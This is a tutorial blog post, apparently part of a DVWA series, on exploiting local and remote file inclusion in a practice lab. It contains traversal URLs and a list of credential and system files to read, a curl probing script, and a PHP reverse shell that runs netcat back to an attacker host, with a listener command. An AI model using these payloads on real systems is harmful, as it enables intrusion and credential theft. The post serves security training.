DVWA: Damn Vulnerable Web Application File Inclusion Using Netcat As Web Server (Low Security)

 

"Disclaimer: The information provided in this article is intended for educational and research purposes only. It is not intended to promote or encourage any illegal or unethical activities. Always act responsibly and obtain proper consent before using any tools or techniques described in this article."


Damn Vulnerable Web App (DVWA) is a web application written in PHP with a MySQL database, where we can practice common web vulnerabilities at different security levels. Basically, it is a place where we can legally test our hacking ability. In this article, we're only going to talk about one of the attacks in DVWA, File Inclusion.




So what is file inclusion and why is it a big deal?

When a web application builds the argument of an include/require (or a file read) from user input without validating it, the attacker gets to choose which file the server loads and, for PHP files, executes. If the chosen file already exists on the target machine (a system file, a log, a previously uploaded file), the attack is called Local File Inclusion (LFI). If the server is made to fetch the file from a URL the attacker controls, it is called Remote File Inclusion (RFI).

This is one more article in the DVWA series. You can grab all articles here.

Local File Inclusion

Open your browser, enter DVWA URL, log in and navigate to the ‘file inclusion’ page.

If we click on the links file1.php, file2.php, and file3.php and look at the generated URL, we can see that the filename is inserted in each page. Let’s tamper with the URL:

10.0.2.6/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd




The '../' sequences in the example above are a directory traversal: each one climbs one directory up from wherever the including script lives. The number needed depends on how deep the web root sits on the victim machine, and once you have reached '/' any extra '../' are simply ignored, so overshooting is safe while undershooting is not. On DVWA's low level the parameter is handed to include() unmodified, so an absolute path such as ?page=/etc/passwd works as well; the traversal form is what you need on targets that prepend a directory to the parameter.

We can see that the contents of /etc/passwd are displayed on the screen. A lot of useful information about the host can be obtained this way. Keep in mind that the include runs as the web server user (usually www-data), so only files that user can read come back; /etc/shadow, /root/.bash_history and root's crontab normally fail with "Permission denied" unless the server is badly misconfigured or running as root. Some interesting files to look for include, but are not limited to:

– /etc/issue

– /proc/version

– /etc/profile

– /etc/passwd

– /etc/shadow

– /root/.bash_history

– /var/log/dmesg

– /var/mail/root

– /var/spool/cron/crontabs/root

Sometimes during a Local File Inclusion, the web server appends '.php' to the included file.

For example, including '/etc/passwd' gets rendered as '/etc/passwd.php'. This happens when the code concatenates the extension onto the ?page parameter before including it, e.g. include($_GET['page'] . '.php'). DVWA's low level includes the parameter as-is, which is why the request above works without any trick.

In PHP versions before 5.3.4, ending the value with a URL-encoded null byte (%00) truncated the path at that point, because the underlying C string functions stop at the first NUL, so '/etc/passwd%00.php' was opened as '/etc/passwd'. PHP 5.3.4 and later reject any path containing a null byte, so on a current target this trick no longer works.
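The following script is an added example, not code from the original post: it probes the file list above through the DVWA page parameter with curl, building the traversal string for a chosen depth and optionally appending the %00 suffix discussed in the previous paragraph. It assumes the addresses used in this post (DVWA at 10.0.2.6) and that DVWA_COOKIE holds a logged-in PHPSESSID with the security cookie set to low; the response classification relies on PHP warnings being displayed, which DVWA does by default.

```shell
#!/bin/sh
# Added example (not from the original post). Probe files through the DVWA
# file inclusion parameter. Assumed: DVWA at 10.0.2.6, display_errors on.
BASE_URL=http://10.0.2.6/dvwa/vulnerabilities/fi/
DVWA_COOKIE="${DVWA_COOKIE:-PHPSESSID=replace-me; security=low}"

# Build N copies of ../ followed by the path without its leading slash, plus
# an optional suffix (e.g. %00 for pre-5.3.4 PHP). Extra ../ past the root
# are harmless, so pick a depth that is large rather than exact.
traversal() {
    depth=$1
    path=${2#/}
    prefix=
    i=0
    while [ "$i" -lt "$depth" ]; do
        prefix="${prefix}../"
        i=$((i + 1))
    done
    printf '%s%s%s' "$prefix" "$path" "${3:-}"
}

# Full request URL for a given depth, path and optional suffix.
lfi_url() {
    printf '%s?page=%s' "$BASE_URL" "$(traversal "$1" "$2" "${3:-}")"
}

# Classify a response body. DVWA echoes the included file inline, and a
# failed include() leaves a PHP warning in the page. "ailed to open stream"
# matches both the PHP 7 ("failed") and PHP 8 ("Failed") wording. Check
# "Permission denied" first, because that warning also contains the
# "failed to open stream" text.
classify() {
    case "$1" in
        *"Permission denied"*)                              echo "denied" ;;
        *"No such file"*|*"ailed to open stream"*)          echo "missing" ;;
        *)                                                  echo "included" ;;
    esac
}

# Run the probe over the list from the post. Needs network access to DVWA;
# not executed by the offline checks below.
probe() {
    for f in /etc/issue /proc/version /etc/profile /etc/passwd /etc/shadow \
             /root/.bash_history /var/log/dmesg /var/mail/root \
             /var/spool/cron/crontabs/root; do
        resp=$(curl -s -b "$DVWA_COOKIE" "$(lfi_url 6 "$f")")
        printf '%-32s %s\n' "$f" "$(classify "$resp")"
    done
}
```

Source the file and call probe to run it against the lab; if display_errors is off on the target, a failed include shows no warning and classify will report "included" for an empty body, so in that case also grep the response for a content marker such as root:x:0:0 before trusting the verdict.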

Remote File Inclusion (RFI)

Remote File Inclusion (RFI) means that the attacker makes the web application load and execute a file from a server they control rather than one already on the target. The attacker hosts a PHP file on their own web space, passes its URL in the vulnerable parameter, and the target's PHP interpreter fetches the file over HTTP and executes it with the privileges of the web server user. From the resulting shell the administrator account, passwords or member information can be pulled out of the application and its database.

This only works when PHP has allow_url_include=On (and allow_url_fopen=On). Both are off by default in modern PHP, and the DVWA setup page has you turn allow_url_include on precisely so that this exercise works. If the request below just prints a warning instead of running the payload, check that setting first.

First, restart the Apache service on Kali; it will serve our payload file.




To run our file we need to place it where Apache on Kali serves from: /var/www/html. One check worth doing before moving on: request the file from Kali itself (for example with curl against http://10.0.2.4/coder.php) and confirm you get the PHP source back. If Kali's Apache has the PHP module enabled it will execute the script locally instead of serving it, and the target would then include the (empty) output rather than the code.



Write a small PHP reverse-shell program, save it as coder.php and put it in /var/www/html. All it does is run nc on the target to connect back to our Kali box. The IP in the code must be the Kali host's IP (10.0.2.4 here) and the port must match the listener we start next.

<?php
// Executed by the target's PHP once DVWA includes this file: it spawns a
// shell that connects back to the attacker. nc.traditional -e requires
// netcat-traditional on the target; IP and port must match the listener.
passthru("nc.traditional -e /bin/bash 10.0.2.4 12345");
?>



Now start a Netcat listener on Kali on the port used in the payload. Note that this is not the web server (Apache serves the file); the listener is what receives the reverse shell when the target connects back:

nc -lvp 12345




Now request the DVWA page with the page parameter pointing at the file hosted on Kali (use the browser session you logged in with, and make sure the security cookie is still set to low):

http://10.0.2.6/dvwa/vulnerabilities/fi/?page=http://10.0.2.4/coder.php



This is it. The listener receives a connection and you have a shell on the target as the web server user (typically www-data). The browser request appears to hang while the shell is open, because passthru() is still waiting for nc to exit; that is expected.


If you got stuck or have any questions, leave a comment, and I’ll do my best to get back to you.
